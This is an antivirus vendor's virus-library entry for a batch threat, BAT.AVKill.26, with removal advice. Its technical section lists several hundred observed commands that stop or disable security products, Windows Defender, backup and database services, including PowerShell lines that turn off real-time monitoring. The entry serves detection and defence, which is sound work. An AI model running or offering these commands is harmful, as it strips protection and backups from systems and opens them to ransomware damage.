DLA UŻYTKOWNIKÓW

Zamknij

Library
My library

+ Add to library

Search
Search

Contact us
24/7 Tech support | Rules regarding submitting

Send a message

A query form

Call us

+7 (495) 789-45-86

Forum
Profile

PL

RU CN DE EN ES FR IT JP KZ UZ PL BY
Zamknij
Support services
Scanners
Dr.Web vxCube
Trial
VCI investigations
Virus library
Knowledge base

Technologies

Terminology

Training and education

Myths

News

BAT.AVKill.26

Added to the Dr.Web virus database: 2021-08-11

Virus description added:

Technical Information

Malicious functions
To complicate detection of its presence in the operating system,
blocks execution of the following system utilities:
  • Windows Defender
Executes the following
  • '<SYSTEM32>\net.exe' stop Alerter /y
  • '<SYSTEM32>\net.exe' stop ccSetMgr /y
  • '<SYSTEM32>\net.exe' stop CSAdmin /y
  • '<SYSTEM32>\net.exe' stop CSAuth /y
  • '<SYSTEM32>\net.exe' stop CSDbSync /y
  • '<SYSTEM32>\net.exe' stop CSLog /y
  • '<SYSTEM32>\net.exe' stop CSMon /y
  • '<SYSTEM32>\net.exe' stop CSRadius /y
  • '<SYSTEM32>\net.exe' stop CSTacacs /y
  • '<SYSTEM32>\net.exe' stop Symantec /y
  • '<SYSTEM32>\net.exe' stop VGAuthService /y
  • '<SYSTEM32>\net.exe' stop SepMasterServiceMig /y
  • '<SYSTEM32>\net.exe' stop avbackup /y
  • '<SYSTEM32>\net.exe' stop MSSQL$NET2 /y
  • '<SYSTEM32>\net.exe' stop Net2ClientSvc /y
  • '<SYSTEM32>\net.exe' stop NetSvc /y
  • '<SYSTEM32>\net.exe' stop SQLAgent$NET2 /y
  • '<SYSTEM32>\net.exe' stop tpautoconnsvc /y
  • '<SYSTEM32>\net.exe' stop TPVCGateway /y
  • '<SYSTEM32>\net.exe' stop RSCDsvc /y
  • '<SYSTEM32>\net.exe' stop LRSDRVX /y
  • '<SYSTEM32>\net.exe' stop msvsmon90 /y
  • '<SYSTEM32>\net.exe' stop ccEvtMgr /y
  • '<SYSTEM32>\net.exe' stop IDriverT /y
  • '<SYSTEM32>\net.exe' stop bcrservice /y
  • '<SYSTEM32>\net.exe' stop sysdown /y
  • '<SYSTEM32>\net.exe' stop ERSvc /y
  • '<SYSTEM32>\net.exe' stop Eventlog /y
  • '<SYSTEM32>\net.exe' stop ImapiService /y
  • '<SYSTEM32>\net.exe' stop NetDDE /y
  • '<SYSTEM32>\net.exe' stop NtLmSsp /y
  • '<SYSTEM32>\net.exe' stop NtmsSvc /y
  • '<SYSTEM32>\net.exe' stop odserv /y
  • '<SYSTEM32>\net.exe' stop ose /y
  • '<SYSTEM32>\net.exe' stop SnowInventoryClient /y
  • '<SYSTEM32>\net.exe' stop TlntSvr /y
  • '<SYSTEM32>\net.exe' stop TSM /y
  • '<SYSTEM32>\net.exe' stop WinVNC4 /y
  • '<SYSTEM32>\net.exe' stop BlueStripeCollector /y
  • '<SYSTEM32>\net.exe' stop Cissesrv /y
  • '<SYSTEM32>\net.exe' stop CpqRcmc3 /y
  • '<SYSTEM32>\net.exe' stop gupdate /y
  • '<SYSTEM32>\net.exe' stop gupdatem /y
  • '<SYSTEM32>\net.exe' stop HealthService /y
  • '<SYSTEM32>\net.exe' stop NimbusWatcherService /y
  • '<SYSTEM32>\net.exe' stop ProLiantMonitor /y
  • '<SYSTEM32>\net.exe' stop SDD_Service /y
  • '<SYSTEM32>\net.exe' stop System /y
  • '<SYSTEM32>\net.exe' stop MSMQ /y
Miscellaneous
Executes the following
  • '<SYSTEM32>\sc.exe' config SentinelAgent start= disabled
  • '<SYSTEM32>\sc.exe' config DB2MGMTSVC_DB2COPY1 start= disabled
  • '<SYSTEM32>\sc.exe' config DB2REMOTECMD_DB2COPY1 start= disabled
  • '<SYSTEM32>\sc.exe' config DB2DAS00 start= disabled
  • '<SYSTEM32>\sc.exe' config DB2-0 start= disabled
  • '<SYSTEM32>\sc.exe' config DB2INST2 start= disabled
  • '<SYSTEM32>\sc.exe' config IBMDataServerMgr start= disabled
  • '<SYSTEM32>\sc.exe' config IBMDSServer41 start= disabled
  • '<SYSTEM32>\sc.exe' config DB2LICD_DB2COPY1 start= disabled
  • '<SYSTEM32>\sc.exe' config MSSQL$CITRIX_METAFRAME start= disabled
  • '<SYSTEM32>\sc.exe' config SQLAgent$CXDB start= disabled
  • '<SYSTEM32>\sc.exe' config swi_update start= disabled
  • '<SYSTEM32>\sc.exe' config VeeamHvIntegrationSvc start= disabled
  • '<SYSTEM32>\sc.exe' config WRSVC start= disabled
  • '<SYSTEM32>\sc.exe' config W3Svc start= disabled
  • '<SYSTEM32>\sc.exe' config VeeamTransportSvc start= disabled
  • '<SYSTEM32>\sc.exe' config VeeamRESTSvc start= disabled
  • '<SYSTEM32>\sc.exe' config "McAfee SiteAdvisor Enterprise Service" start= disabled
  • '<SYSTEM32>\sc.exe' config DB2GOVERNOR_DB2COPY1 start= disabled
  • '<SYSTEM32>\sc.exe' config DB2 start= disabled
  • '<SYSTEM32>\sc.exe' config Alerter start= disabled
  • '<SYSTEM32>\sc.exe' config gupdate start= disabled
  • '<SYSTEM32>\sc.exe' config CpqRcmc3 start= disabled
  • '<SYSTEM32>\sc.exe' config Cissesrv start= disabled
  • '<SYSTEM32>\sc.exe' config BlueStripeCollector start= disabled
  • '<SYSTEM32>\sc.exe' config WinVNC4 start= disabled
  • '<SYSTEM32>\sc.exe' config WebClient start= disabled
  • '<SYSTEM32>\sc.exe' config TSM start= disabled
  • '<SYSTEM32>\sc.exe' config TlntSvr start= disabled
  • '<SYSTEM32>\sc.exe' config SnowInventoryClient start= disabled
  • '<SYSTEM32>\sc.exe' config ose start= disabled
  • '<SYSTEM32>\sc.exe' config odserv start= disabled
  • '<SYSTEM32>\sc.exe' config NtmsSvc start= disabled
  • '<SYSTEM32>\sc.exe' config NtLmSsp start= disabled
  • '<SYSTEM32>\sc.exe' config NetDDE start= disabled
  • '<SYSTEM32>\sc.exe' config ImapiService start= disabled
  • '<SYSTEM32>\sc.exe' config Eventlog start= disabled
  • '<SYSTEM32>\sc.exe' config ERSvc start= disabled
  • '<SYSTEM32>\sc.exe' config VeeamNFSSvc start= disabled
  • '<SYSTEM32>\sc.exe' config gupdatem start= disabled
  • '<SYSTEM32>\sc.exe' config VeeamMountSvc start= disabled
  • '<SYSTEM32>\sc.exe' config VeeamDeploySvc start= disabled
  • '<SYSTEM32>\sc.exe' config SQLBrowser start= disabled
  • '<SYSTEM32>\sc.exe' config SQLAgent$VEEAMSQL2012 start= disabled
  • '<SYSTEM32>\sc.exe' config SQLAgent$VEEAMSQL2008R2 start= disabled
  • '<SYSTEM32>\sc.exe' config SQLAgent$TPSAMA start= disabled
  • '<SYSTEM32>\sc.exe' config SQLAgent$TPS start= disabled
  • '<SYSTEM32>\sc.exe' config SQLAgent$SYSTEM_BGC start= disabled
  • '<SYSTEM32>\sc.exe' config SQLAgent$SQL_2008 start= disabled
  • '<SYSTEM32>\sc.exe' config SQLSafeOLRService start= disabled
  • '<SYSTEM32>\sc.exe' config SQLAgent$SHAREPOINT start= disabled
  • '<SYSTEM32>\sc.exe' config SQLAgent$PROFXENGAGEMENT start= disabled
  • '<SYSTEM32>\sc.exe' config SQLAgent$PRACTTICEMGT start= disabled
  • '<SYSTEM32>\sc.exe' config SQLAgent$PRACTTICEBGC start= disabled
  • '<SYSTEM32>\sc.exe' config SQLAgent$ECWDB2 start= disabled
  • '<SYSTEM32>\sc.exe' config SQLAgent$BKUPEXEC start= disabled
  • '<SYSTEM32>\sc.exe' config sophossps start= disabled
  • '<SYSTEM32>\sc.exe' config SntpService start= disabled
  • '<SYSTEM32>\sc.exe' config SQLAgent$SBSMONITORING start= disabled
  • '<SYSTEM32>\sc.exe' config SQLSERVERAGENT start= disabled
  • '<SYSTEM32>\sc.exe' config SQLTELEMETRY start= disabled
  • '<SYSTEM32>\sc.exe' config SQLTELEMETRY$ECWDB2 start= disabled
  • '<SYSTEM32>\sc.exe' config VeeamDeploymentService start= disabled
  • '<SYSTEM32>\sc.exe' config VeeamCloudSvc start= disabled
  • '<SYSTEM32>\sc.exe' config VeeamCatalogSvc start= disabled
  • '<SYSTEM32>\sc.exe' config VeeamBrokerSvc start= disabled
  • '<SYSTEM32>\sc.exe' config VeeamBackupSvc start= disabled
  • '<SYSTEM32>\sc.exe' config UI0Detect start= disabled
  • '<SYSTEM32>\sc.exe' config TrueKeyServiceHelper start= disabled
  • '<SYSTEM32>\sc.exe' config TrueKeyScheduler start= disabled
  • '<SYSTEM32>\sc.exe' config TrueKey start= disabled
  • '<SYSTEM32>\sc.exe' config tmlisten start= disabled
  • '<SYSTEM32>\sc.exe' config TmCCSF start= disabled
  • '<SYSTEM32>\sc.exe' config swi_update_64 start= disabled
  • '<SYSTEM32>\sc.exe' config swi_service start= disabled
  • '<SYSTEM32>\sc.exe' config swi_filter start= disabled
  • '<SYSTEM32>\sc.exe' config svcGenericHost start= disabled
  • '<SYSTEM32>\sc.exe' config SstpSvc start= disabled
  • '<SYSTEM32>\sc.exe' config SQLWriter start= disabled
  • '<SYSTEM32>\sc.exe' config VeeamEnterpriseManagerSvc start= disabled
  • '<SYSTEM32>\sc.exe' config HealthService start= disabled
  • '<SYSTEM32>\sc.exe' config NimbusWatcherService start= disabled
  • '<SYSTEM32>\sc.exe' config ProLiantMonitor start= disabled
  • '<SYSTEM32>\net1.exe' stop CSAdmin /y
  • '<SYSTEM32>\net1.exe' stop ccSetMgr /y
  • '<SYSTEM32>\net1.exe' stop ccEvtMgr /y
  • '<SYSTEM32>\net1.exe' stop bcrservice /y
  • '<SYSTEM32>\net1.exe' stop System /y
  • '<SYSTEM32>\net1.exe' stop sysdown /y
  • '<SYSTEM32>\net1.exe' stop SDD_Service /y
  • '<SYSTEM32>\net1.exe' stop CSDbSync /y
  • '<SYSTEM32>\net1.exe' stop CSAuth /y
  • '<SYSTEM32>\net1.exe' stop HealthService /y
  • '<SYSTEM32>\net1.exe' stop gupdatem /y
  • '<SYSTEM32>\net1.exe' stop gupdate /y
  • '<SYSTEM32>\net1.exe' stop CpqRcmc3 /y
  • '<SYSTEM32>\net1.exe' stop Cissesrv /y
  • '<SYSTEM32>\net1.exe' stop BlueStripeCollector /y
  • '<SYSTEM32>\net1.exe' stop WinVNC4 /y
  • '<SYSTEM32>\net1.exe' stop ProLiantMonitor /y
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' Set-MpPreference -DisableRealtimeMonitoring $true
  • '<SYSTEM32>\net1.exe' stop CSLog /y
  • '<SYSTEM32>\net1.exe' stop MSMQ /y
  • '<SYSTEM32>\net1.exe' stop IDriverT /y
  • '<SYSTEM32>\net1.exe' stop msvsmon90 /y
  • '<SYSTEM32>\net1.exe' stop LRSDRVX /y
  • '<SYSTEM32>\net1.exe' stop RSCDsvc /y
  • '<SYSTEM32>\net1.exe' stop TPVCGateway /y
  • '<SYSTEM32>\net1.exe' stop tpautoconnsvc /y
  • '<SYSTEM32>\net1.exe' stop SQLAgent$NET2 /y
  • '<SYSTEM32>\net1.exe' stop NetSvc /y
  • '<SYSTEM32>\net1.exe' stop Net2ClientSvc /y
  • '<SYSTEM32>\net1.exe' stop MSSQL$NET2 /y
  • '<SYSTEM32>\net1.exe' stop avbackup /y
  • '<SYSTEM32>\net1.exe' stop SepMasterServiceMig /y
  • '<SYSTEM32>\net1.exe' stop VGAuthService /y
  • '<SYSTEM32>\net1.exe' stop Symantec /y
  • '<SYSTEM32>\net1.exe' stop CSTacacs /y
  • '<SYSTEM32>\net1.exe' stop CSRadius /y
  • '<SYSTEM32>\net1.exe' stop TSM /y
  • '<SYSTEM32>\net1.exe' stop NimbusWatcherService /y
  • '<SYSTEM32>\net1.exe' stop TlntSvr /y
  • '<SYSTEM32>\net1.exe' stop SnowInventoryClient /y
  • '<SYSTEM32>\net1.exe' stop ose /y
  • '<SYSTEM32>\sc.exe' config CSAuth start= disabled
  • '<SYSTEM32>\sc.exe' config VGAuthService start= disabled
  • '<SYSTEM32>\sc.exe' config Symantec start= disabled
  • '<SYSTEM32>\sc.exe' config CSTacacs start= disabled
  • '<SYSTEM32>\sc.exe' config CSRadius start= disabled
  • '<SYSTEM32>\sc.exe' config CSMon start= disabled
  • '<SYSTEM32>\sc.exe' config CSLog start= disabled
  • '<SYSTEM32>\sc.exe' config CSDbSync start= disabled
  • '<SYSTEM32>\sc.exe' config CSAdmin start= disabled
  • '<SYSTEM32>\sc.exe' config avbackup start= disabled
  • '<SYSTEM32>\sc.exe' config ccSetMgr start= disabled
  • '<SYSTEM32>\sc.exe' config ccEvtMgr start= disabled
  • '<SYSTEM32>\sc.exe' config bcrservice start= disabled
  • '<SYSTEM32>\sc.exe' config GoogleChromeElevationService start= disabled
  • '<SYSTEM32>\sc.exe' config System start= disabled
  • '<SYSTEM32>\sc.exe' config sysdown start= disabled
  • '<SYSTEM32>\sc.exe' config SDD_Service start= disabled
  • '<SYSTEM32>\sc.exe' config SNAC start= disabled
  • '<SYSTEM32>\sc.exe' config Net2ClientSvc start= disabled
  • '<SYSTEM32>\sc.exe' config MSSQL$NET2 start= disabled
  • '<SYSTEM32>\sc.exe' config SQLAgent$NET2 start= disabled
  • '<SYSTEM32>\sc.exe' config SepMasterServiceMig start= disabled
  • '<SYSTEM32>\net1.exe' stop odserv /y
  • '<SYSTEM32>\net1.exe' stop NtmsSvc /y
  • '<SYSTEM32>\net1.exe' stop NtLmSsp /y
  • '<SYSTEM32>\net1.exe' stop NetDDE /y
  • '<SYSTEM32>\net1.exe' stop ImapiService /y
  • '<SYSTEM32>\net1.exe' stop Eventlog /y
  • '<SYSTEM32>\net1.exe' stop ERSvc /y
  • '<SYSTEM32>\net1.exe' stop Alerter /y
  • '<SYSTEM32>\sc.exe' config MSMQ start= disabled
  • '<SYSTEM32>\sc.exe' config IDriverT start= disabled
  • '<SYSTEM32>\sc.exe' config msvsmon90 start= disabled
  • '<SYSTEM32>\sc.exe' config LRSDRVX start= disabled
  • '<SYSTEM32>\sc.exe' config RSCDsvc start= disabled
  • '<SYSTEM32>\sc.exe' config AdobeARMservice start= disabled
  • '<SYSTEM32>\sc.exe' config TPVCGateway start= disabled
  • '<SYSTEM32>\sc.exe' config tpautoconnsvc start= disabled
  • '<SYSTEM32>\sc.exe' config NetSvc start= disabled
  • '<SYSTEM32>\net1.exe' stop CSMon /y
  • '<SYSTEM32>\sc.exe' config SMTPSvc start= disabled
  • '<SYSTEM32>\sc.exe' config MySQL57 start= disabled
  • '<SYSTEM32>\sc.exe' config "Sophos Agent" start= disabled
  • '<SYSTEM32>\sc.exe' config "Enterprise Client Service" start= disabled
  • '<SYSTEM32>\sc.exe' config "Acronis VSS Provider" start= disabled
  • '<SYSTEM32>\sc.exe' config SQLAgent$CITRIX_METAFRAME start= disabled
  • '<SYSTEM32>\sc.exe' config "SQL Backups" start= disabled
  • '<SYSTEM32>\sc.exe' config MSSQL$PROD start= disabled
  • '<SYSTEM32>\sc.exe' config "Zoolz 2 Service" start= disabled
  • '<SYSTEM32>\sc.exe' config "Sophos AutoUpdate Service" start= disabled
  • '<SYSTEM32>\sc.exe' config MSSQLServerADHelper start= disabled
  • '<SYSTEM32>\sc.exe' config msftesql$PROD start= disabled
  • '<SYSTEM32>\sc.exe' config NetMsmqActivator start= disabled
  • '<SYSTEM32>\sc.exe' config ESHASRV start= disabled
  • '<SYSTEM32>\sc.exe' config ekrn start= disabled
  • '<SYSTEM32>\sc.exe' config EhttpSrv start= disabled
  • '<SYSTEM32>\sc.exe' config MSSQL$SOPHOS start= disabled
  • '<SYSTEM32>\sc.exe' config SQLAgent$SOPHOS start= disabled
  • '<SYSTEM32>\sc.exe' config SQLAgent$PROD start= disabled
  • '<SYSTEM32>\sc.exe' config "Sophos Clean Service" start= disabled
  • '<SYSTEM32>\sc.exe' config "Sophos Device Control Service" start= disabled
  • '<SYSTEM32>\sc.exe' config "Sophos File Scanner Service" start= disabled
  • '<SYSTEM32>\sc.exe' config BackupExecAgentAccelerator start= disabled
  • '<SYSTEM32>\sc.exe' config ARSM start= disabled
  • '<SYSTEM32>\sc.exe' config Antivirus start= disabled
  • '<SYSTEM32>\sc.exe' config AcrSch2Svc start= disabled
  • '<SYSTEM32>\sc.exe' config AcronisAgent start= disabled
  • '<SYSTEM32>\sc.exe' config "Veeam Backup Catalog Data Service" start= disabled
  • '<SYSTEM32>\sc.exe' config "Symantec System Recovery" start= disabled
  • '<SYSTEM32>\sc.exe' config "McAfeeDLPAgentService" start= disabled
  • '<SYSTEM32>\sc.exe' config "SQLsafe Filter Service" start= disabled
  • '<SYSTEM32>\sc.exe' config "SQLsafe Backup Service" start= disabled
  • '<SYSTEM32>\sc.exe' config "Sophos Web Control Service" start= disabled
  • '<SYSTEM32>\sc.exe' config "Sophos System Protection Service" start= disabled
  • '<SYSTEM32>\sc.exe' config "Sophos Safestore Service" start= disabled
  • '<SYSTEM32>\sc.exe' config "Sophos Message Router" start= disabled
  • '<SYSTEM32>\sc.exe' config "Sophos MCS Client" start= disabled
  • '<SYSTEM32>\sc.exe' config "Sophos MCS Agent" start= disabled
  • '<SYSTEM32>\sc.exe' config "Sophos Health Service" start= disabled
  • '<SYSTEM32>\sc.exe' config AVP start= disabled
  • '<SYSTEM32>\sc.exe' config BackupExecAgentBrowser start= disabled
  • '<SYSTEM32>\sc.exe' config klnagent start= disabled
  • '<SYSTEM32>\sc.exe' config SQLAgent$SQLEXPRESS start= disabled
  • '<SYSTEM32>\sc.exe' config SSISTELEMETRY130 start= disabled
  • '<SYSTEM32>\sc.exe' config MSSQLLaunchpad$ITRIS start= disabled
  • '<SYSTEM32>\sc.exe' config EPUpdateServicestart= disabled
  • '<SYSTEM32>\sc.exe' config EPSecurityServicestart= disabled
  • '<SYSTEM32>\sc.exe' config BrokerInfrastructurestart= disabled
  • '<SYSTEM32>\sc.exe' config BITSstart= disabled
  • '<SYSTEM32>\sc.exe' config epag start= disable
  • '<SYSTEM32>\sc.exe' config MsDtsServer130 start= disabled
  • '<SYSTEM32>\sc.exe' config EPIntegrationService start= disable
  • '<SYSTEM32>\sc.exe' config epredline start= disable
  • '<SYSTEM32>\sc.exe' config EPUpdateService start= disable
  • '<SYSTEM32>\sc.exe' config EPSecurityService start= disable
  • '<SYSTEM32>\sc.exe' config TmPfw start= disable
  • '<SYSTEM32>\sc.exe' config SentinelStaticEngine start= disabled
  • '<SYSTEM32>\sc.exe' config LogProcessorService start= disabled
  • '<SYSTEM32>\sc.exe' config SentinelHelperService start= disabled
  • '<SYSTEM32>\sc.exe' config EPProtectedService start= disable
  • '<SYSTEM32>\sc.exe' config SQLTELEMETRY$ITRIS start= disabled
  • '<SYSTEM32>\sc.exe' config SQLAgent$ITRIS start= disabled
  • '<SYSTEM32>\sc.exe' config SQLAgent$EPOSERVER start= disabled
  • '<SYSTEM32>\sc.exe' config wbengine start= disabled
  • '<SYSTEM32>\sc.exe' config kavfsslp start= disabled
  • '<SYSTEM32>\sc.exe' config KAVFSGT start= disabled
  • '<SYSTEM32>\sc.exe' config KAVFS start= disabled
  • '<SYSTEM32>\sc.exe' config mfefire start= disabled
  • '<SYSTEM32>\sc.exe' config "avast! Antivirus" start= disabled
  • '<SYSTEM32>\sc.exe' config aswBcc start= disabled
  • '<SYSTEM32>\sc.exe' config "Avast Business Console Client Antivirus Service" start= disabled
  • '<SYSTEM32>\sc.exe' config mfewc start= disabled
  • '<SYSTEM32>\sc.exe' config Telemetryserver start= disabled
  • '<SYSTEM32>\sc.exe' config WinDefend start= disabled
  • '<SYSTEM32>\sc.exe' config WdNisSvc start= disabled
  • '<SYSTEM32>\sc.exe' config MCAFEETOMCATSRV530 start= disabled
  • '<SYSTEM32>\sc.exe' config MCAFEEEVENTPARSERSRV start= disabled
  • '<SYSTEM32>\sc.exe' config MSSQLFDLauncher$ITRIS start= disabled
  • '<SYSTEM32>\sc.exe' config MSSQL$EPOSERVER start= disabled
  • '<SYSTEM32>\sc.exe' config MSSQL$ITRIS start= disabled
  • '<SYSTEM32>\sc.exe' config MSSQL$SQLEXPRESS start= disabled
  • '<SYSTEM32>\sc.exe' config BackupExecDeviceMediaService start= disabled
  • '<SYSTEM32>\sc.exe' config BackupExecJobEngine start= disabled
  • '<SYSTEM32>\sc.exe' config BackupExecManagementService start= disabled
  • '<SYSTEM32>\sc.exe' config MSSQLFDLauncher$TPSAMA start= disabled
  • '<SYSTEM32>\sc.exe' config MSSQLFDLauncher$TPS start= disabled
  • '<SYSTEM32>\sc.exe' config MSSQLFDLauncher$SYSTEM_BGC start= disabled
  • '<SYSTEM32>\sc.exe' config MSSQLFDLauncher$SQL_2008 start= disabled
  • '<SYSTEM32>\sc.exe' config MSSQLFDLauncher$SHAREPOINT start= disabled
  • '<SYSTEM32>\sc.exe' config MSSQLFDLauncher$SBSMONITORING start= disabled
  • '<SYSTEM32>\sc.exe' config MSSQLFDLauncher$PROFXENGAGEMENT start= disabled
  • '<SYSTEM32>\sc.exe' config MSSQLServerADHelper100 start= disabled
  • '<SYSTEM32>\sc.exe' config MSSQLSERVER start= disabled
  • '<SYSTEM32>\sc.exe' config MSSQL$VEEAMSQL2008R2 start= disabled
  • '<SYSTEM32>\sc.exe' config MSSQL$TPSAMA start= disabled
  • '<SYSTEM32>\sc.exe' config MSSQL$TPS start= disabled
  • '<SYSTEM32>\sc.exe' config MSSQL$SYSTEM_BGC start= disabled
  • '<SYSTEM32>\sc.exe' config MSSQL$SQL_2008 start= disabled
  • '<SYSTEM32>\sc.exe' config MSSQL$SHAREPOINT start= disabled
  • '<SYSTEM32>\sc.exe' config MSSQL$SBSMONITORING start= disabled
  • '<SYSTEM32>\sc.exe' config MSSQLFDLauncher start= disabled
  • '<SYSTEM32>\sc.exe' config Smcinst start= disabled
  • '<SYSTEM32>\sc.exe' config MSSQLServerOLAPService start= disabled
  • '<SYSTEM32>\sc.exe' config ShMonitor start= disabled
  • '<SYSTEM32>\sc.exe' config SepMasterService start= disabled
  • '<SYSTEM32>\sc.exe' config SDRSVC start= disabled
  • '<SYSTEM32>\sc.exe' config SAVService start= disabled
  • '<SYSTEM32>\sc.exe' config SAVAdminService start= disabled
  • '<SYSTEM32>\sc.exe' config SamSs start= disabled
  • '<SYSTEM32>\sc.exe' config sacsvr start= disabled
  • '<SYSTEM32>\sc.exe' config RESvc start= disabled
  • '<SYSTEM32>\sc.exe' config ReportServer$TPSAMA start= disabled
  • '<SYSTEM32>\sc.exe' config ReportServer$TPS start= disabled
  • '<SYSTEM32>\sc.exe' config ReportServer$SYSTEM_BGC start= disabled
  • '<SYSTEM32>\sc.exe' config ReportServer$SQL_2008 start= disabled
  • '<SYSTEM32>\sc.exe' config ReportServer start= disabled
  • '<SYSTEM32>\sc.exe' config POP3Svc start= disabled
  • '<SYSTEM32>\sc.exe' config PDVFSService start= disabled
  • '<SYSTEM32>\sc.exe' config OracleClientCache80 start= disabled
  • '<SYSTEM32>\sc.exe' config ntrtscan start= disabled
  • '<SYSTEM32>\sc.exe' config MSSQL$PROFXENGAGEMENT start= disabled
  • '<SYSTEM32>\sc.exe' config MSSQL$VEEAMSQL2012 start= disabled
  • '<SYSTEM32>\sc.exe' config MSSQL$PRACTTICEBGC start= disabled
  • '<SYSTEM32>\sc.exe' config MSSQL$PRACTICEMGT start= disabled
  • '<SYSTEM32>\sc.exe' config MSSQL$ECWDB2 start= disabled
  • '<SYSTEM32>\sc.exe' config FA_Scheduler start= disabled
  • '<SYSTEM32>\sc.exe' config McAfeeEngineService start= disabled
  • '<SYSTEM32>\sc.exe' config MBEndpointAgent start= disabled
  • '<SYSTEM32>\sc.exe' config MBAMService start= disabled
  • '<SYSTEM32>\sc.exe' config masvc start= disabled
  • '<SYSTEM32>\sc.exe' config macmnsvc start= disabled
  • '<SYSTEM32>\sc.exe' config IMAP4Svc start= disabled
  • '<SYSTEM32>\sc.exe' config IISAdmin start= disabled
  • '<SYSTEM32>\sc.exe' config EsgShKernel start= disabled
  • '<SYSTEM32>\sc.exe' config McAfeeFrameworkMcAfeeFramework start= disabled
  • '<SYSTEM32>\sc.exe' config EraserSvc11710 start= disabled
  • '<SYSTEM32>\sc.exe' config EPUpdateService start= disabled
  • '<SYSTEM32>\sc.exe' config EPSecurityService start= disabled
  • '<SYSTEM32>\sc.exe' config DCAgent start= disabled
  • '<SYSTEM32>\sc.exe' config bedbg start= disabled
  • '<SYSTEM32>\sc.exe' config BackupExecVSSProvider start= disabled
  • '<SYSTEM32>\sc.exe' config BackupExecRPCService start= disabled
  • '<SYSTEM32>\sc.exe' config SmcService start= disabled
  • '<SYSTEM32>\sc.exe' config McTaskManager start= disabled
  • '<SYSTEM32>\sc.exe' config McShield start= disabled
  • '<SYSTEM32>\sc.exe' config mfevtp start= disabled
  • '<SYSTEM32>\sc.exe' config McAfeeFramework start= disabled
  • '<SYSTEM32>\sc.exe' config MSSQL$BKUPEXEC start= disabled
  • '<SYSTEM32>\sc.exe' config MSOLAP$TPSAMA start= disabled
  • '<SYSTEM32>\sc.exe' config MSOLAP$TPS start= disabled
  • '<SYSTEM32>\sc.exe' config MSOLAP$SYSTEM_BGC start= disabled
  • '<SYSTEM32>\sc.exe' config MSOLAP$SQL_2008 start= disabled
  • '<SYSTEM32>\sc.exe' config MSExchangeSRS start= disabled
  • '<SYSTEM32>\sc.exe' config MSExchangeSA start= disabled
  • '<SYSTEM32>\sc.exe' config MSExchangeMTA start= disabled
  • '<SYSTEM32>\sc.exe' config MSExchangeMGMT start= disabled
  • '<SYSTEM32>\sc.exe' config MSExchangeIS start= disabled
  • '<SYSTEM32>\sc.exe' config MSExchangeES start= disabled
  • '<SYSTEM32>\sc.exe' config MsDtsServer110 start= disabled
  • '<SYSTEM32>\sc.exe' config MsDtsServer100 start= disabled
  • '<SYSTEM32>\sc.exe' config MsDtsServer start= disabled
  • '<SYSTEM32>\sc.exe' config mozyprobackup start= disabled
  • '<SYSTEM32>\sc.exe' config MMS start= disabled
  • '<SYSTEM32>\sc.exe' config mfemms start= disabled
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' Uninstall-WindowsFeature -Name Windows-Defender

Curing recommendations

  1. If the operating system (OS) can be loaded (either normally or in safe mode), download Dr.Web Security Space and run a full scan of your computer and removable media you use. More about Dr.Web Security Space.
  2. If you cannot boot the OS, change the BIOS settings to boot your system from a CD or USB drive. Download the image of the emergency system repair disk Dr.Web® LiveDisk , mount it on a USB drive or burn it to a CD/DVD. After booting up with this media, run a full scan and cure all the detected threats.
Free trial

 

Download Dr.Web

Download by serial number

Use Dr.Web Anti-virus for macOS to run a full scan of your Mac.

Free trial

 

Download Dr.Web

Download by serial number

Download on App Store

After booting up, run a full scan of all disk partitions with Dr.Web Anti-virus for Linux.

Free trial

 

Download Dr.Web

Download by serial number

  1. If the mobile device is operating normally, download and install Dr.Web for Android. Run a full system scan and follow recommendations to neutralize the detected threats.
  2. If the mobile device has been locked by Android.Locker ransomware (the message on the screen tells you that you have broken some law or demands a set ransom amount; or you will see some other announcement that prevents you from using the handheld normally), do the following:
    • Load your smartphone or tablet in the safe mode (depending on the operating system version and specifications of the particular mobile device involved, this procedure can be performed in various ways; seek clarification from the user guide that was shipped with the device, or contact its manufacturer);
    • Once you have activated safe mode, install the Dr.Web for Android onto the infected handheld and run a full scan of the system; follow the steps recommended for neutralizing the threats that have been detected;
    • Switch off your device and turn it on as normal.

Find out more about Dr.Web for Android

Free trial

14 days

Download now
Get it on Google Play